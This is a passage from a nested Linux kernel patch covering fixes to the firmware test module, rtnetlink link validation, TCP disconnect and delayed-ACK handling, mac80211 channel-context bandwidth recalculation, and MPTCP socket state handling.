+ 	mutex_lock(&test_fw_mutex);
+ 	release_firmware(test_firmware);
+ 	test_firmware = NULL;
++	if (test_fw_config->reqs)
++		__test_release_all_firmware();
+ 	rc = request_firmware_nowait(THIS_MODULE, 1, name, dev, GFP_KERNEL,
+ 				     NULL, trigger_async_request_cb);
+ 	if (rc) {
+@@ -793,6 +804,8 @@ static ssize_t trigger_custom_fallback_store(struct device *dev,
+ 
+ 	mutex_lock(&test_fw_mutex);
+ 	release_firmware(test_firmware);
++	if (test_fw_config->reqs)
++		__test_release_all_firmware();
+ 	test_firmware = NULL;
+ 	rc = request_firmware_nowait(THIS_MODULE, FW_ACTION_NOUEVENT, name,
+ 				     dev, GFP_KERNEL, NULL,
+@@ -855,6 +868,8 @@ static int test_fw_run_batch_request(void *data)
+ 						 test_fw_config->buf_size);
+ 		if (!req->fw)
+ 			kfree(test_buf);
++		else
++			req->fw_buf = test_buf;
+ 	} else {
+ 		req->rc = test_fw_config->req_firmware(&req->fw,
+ 						       req->name,
+@@ -894,6 +909,11 @@ static ssize_t trigger_batched_requests_store(struct device *dev,
+ 
+ 	mutex_lock(&test_fw_mutex);
+ 
++	if (test_fw_config->reqs) {
++		rc = -EBUSY;
++		goto out_bail;
++	}
++
+ 	test_fw_config->reqs =
+ 		vzalloc(array3_size(sizeof(struct test_batched_req),
+ 				    test_fw_config->num_requests, 2));
+@@ -910,6 +930,7 @@ static ssize_t trigger_batched_requests_store(struct device *dev,
+ 		req->fw = NULL;
+ 		req->idx = i;
+ 		req->name = test_fw_config->name;
++		req->fw_buf = NULL;
+ 		req->dev = dev;
+ 		init_completion(&req->completion);
+ 		req->task = kthread_run(test_fw_run_batch_request, req,
+@@ -992,6 +1013,11 @@ ssize_t trigger_batched_requests_async_store(struct device *dev,
+ 
+ 	mutex_lock(&test_fw_mutex);
+ 
++	if (test_fw_config->reqs) {
++		rc = -EBUSY;
++		goto out_bail;
++	}
++
+ 	test_fw_config->reqs =
+ 		vzalloc(array3_size(sizeof(struct test_batched_req),
+ 				    test_fw_config->num_requests, 2));
+@@ -1009,6 +1035,7 @@ ssize_t trigger_batched_requests_async_store(struct device *dev,
+ 	for (i = 0; i < test_fw_config->num_requests; i++) {
+ 		req = &test_fw_config->reqs[i];
+ 		req->name = test_fw_config->name;
++		req->fw_buf = NULL;
+ 		req->fw = NULL;
+ 		req->idx = i;
+ 		init_completion(&req->completion);
+diff --git a/net/atm/resources.c b/net/atm/resources.c
+index 2b2d33eeaf200..995d29e7fb138 100644
+--- a/net/atm/resources.c
++++ b/net/atm/resources.c
+@@ -400,6 +400,7 @@ done:
+ 	return error;
+ }
+ 
++#ifdef CONFIG_PROC_FS
+ void *atm_dev_seq_start(struct seq_file *seq, loff_t *pos)
+ {
+ 	mutex_lock(&atm_dev_mutex);
+@@ -415,3 +416,4 @@ void *atm_dev_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ {
+ 	return seq_list_next(v, &atm_devs, pos);
+ }
++#endif
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 74864dc46a7ef..b192c69f3936c 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -3212,6 +3212,7 @@ struct net_device *rtnl_create_link(struct net *net, const char *ifname,
+ 	struct net_device *dev;
+ 	unsigned int num_tx_queues = 1;
+ 	unsigned int num_rx_queues = 1;
++	int err;
+ 
+ 	if (tb[IFLA_NUM_TX_QUEUES])
+ 		num_tx_queues = nla_get_u32(tb[IFLA_NUM_TX_QUEUES]);
+@@ -3247,13 +3248,18 @@ struct net_device *rtnl_create_link(struct net *net, const char *ifname,
+ 	if (!dev)
+ 		return ERR_PTR(-ENOMEM);
+ 
++	err = validate_linkmsg(dev, tb, extack);
++	if (err < 0) {
++		free_netdev(dev);
++		return ERR_PTR(err);
++	}
++
+ 	dev_net_set(dev, net);
+ 	dev->rtnl_link_ops = ops;
+ 	dev->rtnl_link_state = RTNL_LINK_INITIALIZING;
+ 
+ 	if (tb[IFLA_MTU]) {
+ 		u32 mtu = nla_get_u32(tb[IFLA_MTU]);
+-		int err;
+ 
+ 		err = dev_validate_mtu(dev, mtu, extack);
+ 		if (err) {
+diff --git a/net/core/sock.c b/net/core/sock.c
+index eb0b76acd9df1..83f590d8d0850 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -2370,7 +2370,6 @@ void sk_setup_caps(struct sock *sk, struct dst_entry *dst)
+ {
+ 	u32 max_segs = 1;
+ 
+-	sk_dst_set(sk, dst);
+ 	sk->sk_route_caps = dst->dev->features;
+ 	if (sk_is_tcp(sk))
+ 		sk->sk_route_caps |= NETIF_F_GSO;
+@@ -2392,6 +2391,7 @@ void sk_setup_caps(struct sock *sk, struct dst_entry *dst)
+ 		}
+ 	}
+ 	sk->sk_gso_max_segs = max_segs;
++	sk_dst_set(sk, dst);
+ }
+ EXPORT_SYMBOL_GPL(sk_setup_caps);
+ 
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 5fd0ff5734e36..ebb737ac9e894 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -589,6 +589,7 @@ static long inet_wait_for_connect(struct sock *sk, long timeo, int writebias)
+ 
+ 	add_wait_queue(sk_sleep(sk), &wait);
+ 	sk->sk_write_pending += writebias;
++	sk->sk_wait_pending++;
+ 
+ 	/* Basic assumption: if someone sets sk->sk_err, he _must_
+ 	 * change state of the socket from TCP_SYN_*.
+@@ -604,6 +605,7 @@ static long inet_wait_for_connect(struct sock *sk, long timeo, int writebias)
+ 	}
+ 	remove_wait_queue(sk_sleep(sk), &wait);
+ 	sk->sk_write_pending -= writebias;
++	sk->sk_wait_pending--;
+ 	return timeo;
+ }
+ 
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 916075e00d066..8e35ea66d930a 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -1143,6 +1143,7 @@ struct sock *inet_csk_clone_lock(const struct sock *sk,
+ 	if (newsk) {
+ 		struct inet_connection_sock *newicsk = inet_csk(newsk);
+ 
++		newsk->sk_wait_pending = 0;
+ 		inet_sk_set_state(newsk, TCP_SYN_RECV);
+ 		newicsk->icsk_bind_hash = NULL;
+ 		newicsk->icsk_bind2_hash = NULL;
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 021a8bf6a1898..0bd0be3c63d22 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -3079,6 +3079,12 @@ int tcp_disconnect(struct sock *sk, int flags)
+ 	int old_state = sk->sk_state;
+ 	u32 seq;
+ 
++	/* Deny disconnect if other threads are blocked in sk_wait_event()
++	 * or inet_wait_for_connect().
++	 */
++	if (sk->sk_wait_pending)
++		return -EBUSY;
++
+ 	if (old_state != TCP_CLOSE)
+ 		tcp_set_state(sk, TCP_CLOSE);
+ 
+@@ -4065,7 +4071,8 @@ int do_tcp_getsockopt(struct sock *sk, int level,
+ 	switch (optname) {
+ 	case TCP_MAXSEG:
+ 		val = tp->mss_cache;
+-		if (!val && ((1 << sk->sk_state) & (TCPF_CLOSE | TCPF_LISTEN)))
++		if (tp->rx_opt.user_mss &&
++		    ((1 << sk->sk_state) & (TCPF_CLOSE | TCPF_LISTEN)))
+ 			val = tp->rx_opt.user_mss;
+ 		if (tp->repair)
+ 			val = tp->rx_opt.mss_clamp;
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index ac44edd6f52e6..5dabb38b857ff 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -4529,7 +4529,7 @@ static void tcp_sack_maybe_coalesce(struct tcp_sock *tp)
+ 	}
+ }
+ 
+-static void tcp_sack_compress_send_ack(struct sock *sk)
++void tcp_sack_compress_send_ack(struct sock *sk)
+ {
+ 	struct tcp_sock *tp = tcp_sk(sk);
+ 
+diff --git a/net/ipv4/tcp_timer.c b/net/ipv4/tcp_timer.c
+index cb79127f45c34..0b5d0a2867a8c 100644
+--- a/net/ipv4/tcp_timer.c
++++ b/net/ipv4/tcp_timer.c
+@@ -290,9 +290,19 @@ static int tcp_write_timeout(struct sock *sk)
+ void tcp_delack_timer_handler(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
++	struct tcp_sock *tp = tcp_sk(sk);
+ 
+-	if (((1 << sk->sk_state) & (TCPF_CLOSE | TCPF_LISTEN)) ||
+-	    !(icsk->icsk_ack.pending & ICSK_ACK_TIMER))
++	if ((1 << sk->sk_state) & (TCPF_CLOSE | TCPF_LISTEN))
++		return;
++
++	/* Handling the sack compression case */
++	if (tp->compressed_ack) {
++		tcp_mstamp_refresh(tp);
++		tcp_sack_compress_send_ack(sk);
++		return;
++	}
++
++	if (!(icsk->icsk_ack.pending & ICSK_ACK_TIMER))
+ 		return;
+ 
+ 	if (time_after(icsk->icsk_ack.timeout, jiffies)) {
+@@ -312,7 +322,7 @@ void tcp_delack_timer_handler(struct sock *sk)
+ 			inet_csk_exit_pingpong_mode(sk);
+ 			icsk->icsk_ack.ato      = TCP_ATO_MIN;
+ 		}
+-		tcp_mstamp_refresh(tcp_sk(sk));
++		tcp_mstamp_refresh(tp);
+ 		tcp_send_ack(sk);
+ 		__NET_INC_STATS(sock_net(sk), LINUX_MIB_DELAYEDACKS);
+ 	}
+diff --git a/net/mac80211/chan.c b/net/mac80211/chan.c
+index e72cf0749d492..f07e34bed8f3a 100644
+--- a/net/mac80211/chan.c
++++ b/net/mac80211/chan.c
+@@ -258,7 +258,8 @@ ieee80211_get_max_required_bw(struct ieee80211_sub_if_data *sdata,
+ 
+ static enum nl80211_chan_width
+ ieee80211_get_chanctx_vif_max_required_bw(struct ieee80211_sub_if_data *sdata,
+-					  struct ieee80211_chanctx_conf *conf)
++					  struct ieee80211_chanctx *ctx,
++					  struct ieee80211_link_data *rsvd_for)
+ {
+ 	enum nl80211_chan_width max_bw = NL80211_CHAN_WIDTH_20_NOHT;
+ 	struct ieee80211_vif *vif = &sdata->vif;
+@@ -267,13 +268,14 @@ ieee80211_get_chanctx_vif_max_required_bw(struct ieee80211_sub_if_data *sdata,
+ 	rcu_read_lock();
+ 	for (link_id = 0; link_id < ARRAY_SIZE(sdata->link); link_id++) {
+ 		enum nl80211_chan_width width = NL80211_CHAN_WIDTH_20_NOHT;
+-		struct ieee80211_bss_conf *link_conf =
+-			rcu_dereference(sdata->vif.link_conf[link_id]);
++		struct ieee80211_link_data *link =
++			rcu_dereference(sdata->link[link_id]);
+ 
+-		if (!link_conf)
++		if (!link)
+ 			continue;
+ 
+-		if (rcu_access_pointer(link_conf->chanctx_conf) != conf)
++		if (link != rsvd_for &&
++		    rcu_access_pointer(link->conf->chanctx_conf) != &ctx->conf)
+ 			continue;
+ 
+ 		switch (vif->type) {
+@@ -287,7 +289,7 @@ ieee80211_get_chanctx_vif_max_required_bw(struct ieee80211_sub_if_data *sdata,
+ 			 * point, so take the width from the chandef, but
+ 			 * account also for TDLS peers
+ 			 */
+-			width = max(link_conf->chandef.width,
++			width = max(link->conf->chandef.width,
+ 				    ieee80211_get_max_required_bw(sdata, link_id));
+ 			break;
+ 		case NL80211_IFTYPE_P2P_DEVICE:
+@@ -296,7 +298,7 @@ ieee80211_get_chanctx_vif_max_required_bw(struct ieee80211_sub_if_data *sdata,
+ 		case NL80211_IFTYPE_ADHOC:
+ 		case NL80211_IFTYPE_MESH_POINT:
+ 		case NL80211_IFTYPE_OCB:
+-			width = link_conf->chandef.width;
++			width = link->conf->chandef.width;
+ 			break;
+ 		case NL80211_IFTYPE_WDS:
+ 		case NL80211_IFTYPE_UNSPECIFIED:
+@@ -316,7 +318,8 @@ ieee80211_get_chanctx_vif_max_required_bw(struct ieee80211_sub_if_data *sdata,
+ 
+ static enum nl80211_chan_width
+ ieee80211_get_chanctx_max_required_bw(struct ieee80211_local *local,
+-				      struct ieee80211_chanctx_conf *conf)
++				      struct ieee80211_chanctx *ctx,
++				      struct ieee80211_link_data *rsvd_for)
+ {
+ 	struct ieee80211_sub_if_data *sdata;
+ 	enum nl80211_chan_width max_bw = NL80211_CHAN_WIDTH_20_NOHT;
+@@ -328,7 +331,8 @@ ieee80211_get_chanctx_max_required_bw(struct ieee80211_local *local,
+ 		if (!ieee80211_sdata_running(sdata))
+ 			continue;
+ 
+-		width = ieee80211_get_chanctx_vif_max_required_bw(sdata, conf);
++		width = ieee80211_get_chanctx_vif_max_required_bw(sdata, ctx,
++								  rsvd_for);
+ 
+ 		max_bw = max(max_bw, width);
+ 	}
+@@ -336,8 +340,8 @@ ieee80211_get_chanctx_max_required_bw(struct ieee80211_local *local,
+ 	/* use the configured bandwidth in case of monitor interface */
+ 	sdata = rcu_dereference(local->monitor_sdata);
+ 	if (sdata &&
+-	    rcu_access_pointer(sdata->vif.bss_conf.chanctx_conf) == conf)
+-		max_bw = max(max_bw, conf->def.width);
++	    rcu_access_pointer(sdata->vif.bss_conf.chanctx_conf) == &ctx->conf)
++		max_bw = max(max_bw, ctx->conf.def.width);
+ 
+ 	rcu_read_unlock();
+ 
+@@ -349,8 +353,10 @@ ieee80211_get_chanctx_max_required_bw(struct ieee80211_local *local,
+  * the max of min required widths of all the interfaces bound to this
+  * channel context.
+  */
+-static u32 _ieee80211_recalc_chanctx_min_def(struct ieee80211_local *local,
+-					     struct ieee80211_chanctx *ctx)
++static u32
++_ieee80211_recalc_chanctx_min_def(struct ieee80211_local *local,
++				  struct ieee80211_chanctx *ctx,
++				  struct ieee80211_link_data *rsvd_for)
+ {
+ 	enum nl80211_chan_width max_bw;
+ 	struct cfg80211_chan_def min_def;
+@@ -370,7 +376,7 @@ static u32 _ieee80211_recalc_chanctx_min_def(struct ieee80211_local *local,
+ 		return 0;
+ 	}
+ 
+-	max_bw = ieee80211_get_chanctx_max_required_bw(local, &ctx->conf);
++	max_bw = ieee80211_get_chanctx_max_required_bw(local, ctx, rsvd_for);
+ 
+ 	/* downgrade chandef up to max_bw */
+ 	min_def = ctx->conf.def;
+@@ -448,9 +454,10 @@ static void ieee80211_chan_bw_change(struct ieee80211_local *local,
+  * channel context.
+  */
+ void ieee80211_recalc_chanctx_min_def(struct ieee80211_local *local,
+-				      struct ieee80211_chanctx *ctx)
++				      struct ieee80211_chanctx *ctx,
++				      struct ieee80211_link_data *rsvd_for)
+ {
+-	u32 changed = _ieee80211_recalc_chanctx_min_def(local, ctx);
++	u32 changed = _ieee80211_recalc_chanctx_min_def(local, ctx, rsvd_for);
+ 
+ 	if (!changed)
+ 		return;
+@@ -464,10 +471,11 @@ void ieee80211_recalc_chanctx_min_def(struct ieee80211_local *local,
+ 	ieee80211_chan_bw_change(local, ctx, false);
+ }
+ 
+-static void ieee80211_change_chanctx(struct ieee80211_local *local,
+-				     struct ieee80211_chanctx *ctx,
+-				     struct ieee80211_chanctx *old_ctx,
+-				     const struct cfg80211_chan_def *chandef)
++static void _ieee80211_change_chanctx(struct ieee80211_local *local,
++				      struct ieee80211_chanctx *ctx,
++				      struct ieee80211_chanctx *old_ctx,
++				      const struct cfg80211_chan_def *chandef,
++				      struct ieee80211_link_data *rsvd_for)
+ {
+ 	u32 changed;
+ 
+@@ -492,7 +500,7 @@ static void ieee80211_change_chanctx(struct ieee80211_local *local,
+ 	ieee80211_chan_bw_change(local, old_ctx, true);
+ 
+ 	if (cfg80211_chandef_identical(&ctx->conf.def, chandef)) {
+-		ieee80211_recalc_chanctx_min_def(local, ctx);
++		ieee80211_recalc_chanctx_min_def(local, ctx, rsvd_for);
+ 		return;
+ 	}
+ 
+@@ -502,7 +510,7 @@ static void ieee80211_change_chanctx(struct ieee80211_local *local,
+ 
+ 	/* check if min chanctx also changed */
+ 	changed = IEEE80211_CHANCTX_CHANGE_WIDTH |
+-		  _ieee80211_recalc_chanctx_min_def(local, ctx);
++		  _ieee80211_recalc_chanctx_min_def(local, ctx, rsvd_for);
+ 	drv_change_chanctx(local, ctx, changed);
+ 
+ 	if (!local->use_chanctx) {
+@@ -514,6 +522,14 @@ static void ieee80211_change_chanctx(struct ieee80211_local *local,
+ 	ieee80211_chan_bw_change(local, old_ctx, false);
+ }
+ 
++static void ieee80211_change_chanctx(struct ieee80211_local *local,
++				     struct ieee80211_chanctx *ctx,
++				     struct ieee80211_chanctx *old_ctx,
++				     const struct cfg80211_chan_def *chandef)
++{
++	_ieee80211_change_chanctx(local, ctx, old_ctx, chandef, NULL);
++}
++
+ static struct ieee80211_chanctx *
+ ieee80211_find_chanctx(struct ieee80211_local *local,
+ 		       const struct cfg80211_chan_def *chandef,
+@@ -638,7 +654,7 @@ ieee80211_alloc_chanctx(struct ieee80211_local *local,
+ 	ctx->conf.rx_chains_dynamic = 1;
+ 	ctx->mode = mode;
+ 	ctx->conf.radar_enabled = false;
+-	ieee80211_recalc_chanctx_min_def(local, ctx);
++	_ieee80211_recalc_chanctx_min_def(local, ctx, NULL);
+ 
+ 	return ctx;
+ }
+@@ -855,6 +871,9 @@ static int ieee80211_assign_link_chanctx(struct ieee80211_link_data *link,
+ 	}
+ 
+ 	if (new_ctx) {
++		/* recalc considering the link we'll use it for now */
++		ieee80211_recalc_chanctx_min_def(local, new_ctx, link);
++
+ 		ret = drv_assign_vif_chanctx(local, sdata, link->conf, new_ctx);
+ 		if (ret)
+ 			goto out;
+@@ -873,12 +892,12 @@ out:
+ 		ieee80211_recalc_chanctx_chantype(local, curr_ctx);
+ 		ieee80211_recalc_smps_chanctx(local, curr_ctx);
+ 		ieee80211_recalc_radar_chanctx(local, curr_ctx);
+-		ieee80211_recalc_chanctx_min_def(local, curr_ctx);
++		ieee80211_recalc_chanctx_min_def(local, curr_ctx, NULL);
+ 	}
+ 
+ 	if (new_ctx && ieee80211_chanctx_num_assigned(local, new_ctx) > 0) {
+ 		ieee80211_recalc_txpower(sdata, false);
+-		ieee80211_recalc_chanctx_min_def(local, new_ctx);
++		ieee80211_recalc_chanctx_min_def(local, new_ctx, NULL);
+ 	}
+ 
+ 	if (sdata->vif.type != NL80211_IFTYPE_P2P_DEVICE &&
+@@ -1270,7 +1289,7 @@ ieee80211_link_use_reserved_reassign(struct ieee80211_link_data *link)
+ 
+ 	ieee80211_link_update_chandef(link, &link->reserved_chandef);
+ 
+-	ieee80211_change_chanctx(local, new_ctx, old_ctx, chandef);
++	_ieee80211_change_chanctx(local, new_ctx, old_ctx, chandef, link);
+ 
+ 	vif_chsw[0].vif = &sdata->vif;
+ 	vif_chsw[0].old_ctx = &old_ctx->conf;
+@@ -1300,7 +1319,7 @@ ieee80211_link_use_reserved_reassign(struct ieee80211_link_data *link)
+ 	if (ieee80211_chanctx_refcount(local, old_ctx) == 0)
+ 		ieee80211_free_chanctx(local, old_ctx);
+ 
+-	ieee80211_recalc_chanctx_min_def(local, new_ctx);
++	ieee80211_recalc_chanctx_min_def(local, new_ctx, NULL);
+ 	ieee80211_recalc_smps_chanctx(local, new_ctx);
+ 	ieee80211_recalc_radar_chanctx(local, new_ctx);
+ 
+@@ -1665,7 +1684,7 @@ static int ieee80211_vif_use_reserved_switch(struct ieee80211_local *local)
+ 		ieee80211_recalc_chanctx_chantype(local, ctx);
+ 		ieee80211_recalc_smps_chanctx(local, ctx);
+ 		ieee80211_recalc_radar_chanctx(local, ctx);
+-		ieee80211_recalc_chanctx_min_def(local, ctx);
++		ieee80211_recalc_chanctx_min_def(local, ctx, NULL);
+ 
+ 		list_for_each_entry_safe(link, link_tmp, &ctx->reserved_links,
+ 					 reserved_chanctx_list) {
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index e57001e00a3d0..27479bbb093ac 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -2475,7 +2475,8 @@ int ieee80211_chanctx_refcount(struct ieee80211_local *local,
+ void ieee80211_recalc_smps_chanctx(struct ieee80211_local *local,
+ 				   struct ieee80211_chanctx *chanctx);
+ void ieee80211_recalc_chanctx_min_def(struct ieee80211_local *local,
+-				      struct ieee80211_chanctx *ctx);
++				      struct ieee80211_chanctx *ctx,
++				      struct ieee80211_link_data *rsvd_for);
+ bool ieee80211_is_radar_required(struct ieee80211_local *local);
+ 
+ void ieee80211_dfs_cac_timer(unsigned long data);
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index 0785d9393e718..784b9ba61581e 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -2899,7 +2899,7 @@ void ieee80211_recalc_min_chandef(struct ieee80211_sub_if_data *sdata,
+ 
+ 		chanctx = container_of(chanctx_conf, struct ieee80211_chanctx,
+ 				       conf);
+-		ieee80211_recalc_chanctx_min_def(local, chanctx);
++		ieee80211_recalc_chanctx_min_def(local, chanctx, NULL);
+ 	}
+  unlock:
+ 	mutex_unlock(&local->chanctx_mtx);
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index ea46a5cb1c30f..59186997c3e2e 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -111,8 +111,8 @@ static int __mptcp_socket_create(struct mptcp_sock *msk)
+ 	if (err)
+ 		return err;
+ 
+-	msk->first = ssock->sk;
+-	msk->subflow = ssock;
++	WRITE_ONCE(msk->first, ssock->sk);
++	WRITE_ONCE(msk->subflow, ssock);
+ 	subflow = mptcp_subflow_ctx(ssock->sk);
+ 	list_add(&subflow->node, &msk->conn_list);
+ 	sock_hold(ssock->sk);
+@@ -599,7 +599,7 @@ static bool mptcp_check_data_fin(struct sock *sk)
+ 		WRITE_ONCE(msk->ack_seq, msk->ack_seq + 1);
+ 		WRITE_ONCE(msk->rcv_data_fin, 0);
+ 
+-		sk->sk_shutdown |= RCV_SHUTDOWN;
++		WRITE_ONCE(sk->sk_shutdown, sk->sk_shutdown | RCV_SHUTDOWN);
+ 		smp_mb__before_atomic(); /* SHUTDOWN must be visible first */
+ 
+ 		switch (sk->sk_state) {
+@@ -821,6 +821,13 @@ void mptcp_data_ready(struct sock *sk, struct sock *ssk)
+ 	mptcp_data_unlock(sk);
+ }
+ 
++static void mptcp_subflow_joined(struct mptcp_sock *msk, struct sock *ssk)
++{
++	mptcp_subflow_ctx(ssk)->map_seq = READ_ONCE(msk->ack_seq);
++	WRITE_ONCE(msk->allow_infinite_fallback, false);
++	mptcp_event(MPTCP_EVENT_SUB_ESTABLISHED, msk, ssk, GFP_ATOMIC);
++}
++
+ static bool __mptcp_finish_join(struct mptcp_sock *msk, struct sock *ssk)
+ {
+ 	struct sock *sk = (struct sock *)msk;
+@@ -835,6 +842,7 @@ static bool __mptcp_finish_join(struct mptcp_sock *msk, struct sock *ssk)
+ 		mptcp_sock_graft(ssk, sk->sk_socket);
+ 
+ 	mptcp_sockopt_sync_locked(msk, ssk);
++	mptcp_subflow_joined(msk, ssk);
+ 	return true;
+ }
+ 
+@@ -906,7 +914,7 @@ static void mptcp_check_for_eof(struct mptcp_sock *msk)
+ 		/* hopefully temporary hack: propagate shutdown status
+ 		 * to msk, when all subflows agree on it
+ 		 */
+-		sk->sk_shutdown |= RCV_SHUTDOWN;
++		WRITE_ONCE(sk->sk_shutdown, sk->sk_shutdown | RCV_SHUTDOWN);
+ 
+ 		smp_mb__before_atomic(); /* SHUTDOWN must be visible first */
+ 		sk->sk_data_ready(sk);
+@@ -1683,7 +1691,6 @@ static int mptcp_sendmsg_fastopen(struct sock *sk, struct sock *ssk, struct msgh
+ 
+ 	lock_sock(ssk);
+ 	msg->msg_flags |= MSG_DONTWAIT;
+-	msk->connect_flags = O_NONBLOCK;
+ 	msk->fastopening = 1;
+ 	ret = tcp_sendmsg_fastopen(ssk, msg, copied_syn, len, NULL);
+ 	msk->fastopening = 0;
+@@ -2269,7 +2276,7 @@ static void mptcp_dispose_initial_subflow(struct mptcp_sock *msk)
+ {
+ 	if (msk->subflow) {
+ 		iput(SOCK_INODE(msk->subflow));
+-		msk->subflow = NULL;
++		WRITE_ONCE(msk->subflow, NULL);
+ 	}
+ }
+ 
+@@ -2405,7 +2412,7 @@ out_release:
+ 	sock_put(ssk);
+ 
+ 	if (ssk == msk->first)
+-		msk->first = NULL;
++		WRITE_ONCE(msk->first, NULL);
+ 
+ out:
+ 	if (ssk == msk->last_snd)
+@@ -2512,7 +2519,7 @@ static void mptcp_check_fastclose(struct mptcp_sock *msk)
+ 	}
+ 
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+-	sk->sk_shutdown = SHUTDOWN_MASK;
++	WRITE_ONCE(sk->sk_shutdown, SHUTDOWN_MASK);
+ 	smp_mb__before_atomic(); /* SHUTDOWN must be visible first */
+ 	set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags);
+ 
+@@ -2706,7 +2713,7 @@ static int __mptcp_init_sock(struct sock *sk)
+ 	WRITE_ONCE(msk->rmem_released, 0);
+ 	msk->timer_ival = TCP_RTO_MIN;
+ 
+-	msk->first = NULL;
++	WRITE_ONCE(msk->first, NULL);
+ 	inet_csk(sk)->icsk_sync_mss = mptcp_sync_mss;
+ 	WRITE_ONCE(msk->csum_enabled, mptcp_is_checksum_enabled(sock_net(sk)));
+ 	WRITE_ONCE(msk->allow_infinite_fallback, true);
+@@ -2941,7 +2948,7 @@ bool __mptcp_close(struct sock *sk, long timeout)
+ 	bool do_cancel_work = false;
+ 	int subflows_alive = 0;
+ 
+-	sk->sk_shutdown = SHUTDOWN_MASK;
++	WRITE_ONCE(sk->sk_shutdown, SHUTDOWN_MASK);
+ 
+ 	if ((1 << sk->sk_state) & (TCPF_LISTEN | TCPF_CLOSE)) {
+ 		inet_sk_state_store(sk, TCP_CLOSE);
+@@ -3017,7 +3024,7 @@ static void mptcp_close(struct sock *sk, long timeout)
+ 	sock_put(sk);
+ }
+ 
+-void mptcp_copy_inaddrs(struct sock *msk, const struct sock *ssk)
++static void mptcp_copy_inaddrs(struct sock *msk, const struct sock *ssk)
+ {
+ #if IS_ENABLED(CONFIG_MPTCP_IPV6)
+ 	const struct ipv6_pinfo *ssk6 = inet6_sk(ssk);
+@@ -3079,7 +3086,7 @@ static int mptcp_disconnect(struct sock *sk, int flags)
+ 	mptcp_pm_data_reset(msk);
+ 	mptcp_ca_reset(sk);
+ 
+-	sk->sk_shutdown = 0;
++	WRITE_ONCE(sk->sk_shutdown, 0);
+ 	sk_error_report(sk);
+ 	return 0;
+ }
+@@ -3093,9 +3100,10 @@ static struct ipv6_pinfo *mptcp_inet6_sk(const struct sock *sk)
+ }
+ #endif
+ 
+-struct sock *mptcp_sk_clone(const struct sock *sk,
+-			    const struct mptcp_options_received *mp_opt,
+-			    struct request_sock *req)
++struct sock *mptcp_sk_clone_init(const struct sock *sk,
++				 const struct mptcp_options_received *mp_opt,
++				 struct sock *ssk,
++				 struct request_sock *req)
+ {
+ 	struct mptcp_subflow_request_sock *subflow_req = mptcp_subflow_rsk(req);
+ 	struct sock *nsk = sk_clone_lock(sk, GFP_ATOMIC);
+@@ -3115,7 +3123,7 @@ struct sock *mptcp_sk_clone(const struct sock *sk,
+ 	msk = mptcp_sk(nsk);
+ 	msk->local_key = subflow_req->local_key;
+ 	msk->token = subflow_req->token;
+-	msk->subflow = NULL;
++	WRITE_ONCE(msk->subflow, NULL);
+ 	msk->in_accept_queue = 1;
+ 	WRITE_ONCE(msk->fully_established, false);
+ 	if (mp_opt->suboptions & OPTION_MPTCP_CSUMREQD)
+@@ -3137,10 +3145,30 @@ struct sock *mptcp_sk_clone(const struct sock *sk,
+ 	}
+ 
+ 	sock_reset_flag(nsk, SOCK_RCU_FREE);
+-	/* will be fully established after successful MPC subflow creation */
+-	inet_sk_state_store(nsk, TCP_SYN_RECV);
+-
+ 	security_inet_csk_clone(nsk, req);
++
++	/* this can't race with mptcp_close(), as the msk is
++	 * not yet exposted to user-space
++	 */
++	inet_sk_state_store(nsk, TCP_ESTABLISHED);
++
++	/* The msk maintain a ref to each subflow in the connections list */
++	WRITE_ONCE(msk->first, ssk);
++	list_add(&mptcp_subflow_ctx(ssk)->node, &msk->conn_list);
++	sock_hold(ssk);
++
++	/* new mpc subflow takes ownership of the newly
++	 * created mptcp socket
++	 */
++	mptcp_token_accept(subflow_req, msk);
++
++	/* set msk addresses early to ensure mptcp_pm_get_local_id()
++	 * uses the correct data
++	 */
++	mptcp_copy_inaddrs(nsk, ssk);
++	mptcp_propagate_sndbuf(nsk, ssk);
++
++	mptcp_rcv_space_init(msk, ssk);
+ 	bh_unlock_sock(nsk);
+ 
+ 	/* note: the newly allocated socket refcount is 2 now */
+@@ -3172,7 +3200,7 @@ static struct sock *mptcp_accept(struct sock *sk, int flags, int *err,
+ 	struct socket *listener;
+ 	struct sock *newsk;
+ 
+-	listener = __mptcp_nmpc_socket(msk);
++	listener = READ_ONCE(msk->subflow);
+ 	if (WARN_ON_ONCE(!listener)) {
+ 		*err = -EINVAL;
+ 		return NULL;
+@@ -3398,7 +3426,7 @@ static int mptcp_get_port(struct sock *sk, unsigned short snum)
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 	struct socket *ssock;
+ 
+-	ssock = __mptcp_nmpc_socket(msk);
++	ssock = msk->subflow;
+ 	pr_debug("msk=%p, subflow=%p", msk, ssock);
+ 	if (WARN_ON_ONCE(!ssock))
+ 		return -EINVAL;
+@@ -3465,14 +3493,16 @@ bool mptcp_finish_join(struct sock *ssk)
+ 		return false;
+ 	}
+ 
+-	if (!list_empty(&subflow->node))
+-		goto out;
++	/* active subflow, already present inside the conn_list */
++	if (!list_empty(&subflow->node)) {
++		mptcp_subflow_joined(msk, ssk);
++		return true;
++	}
+ 
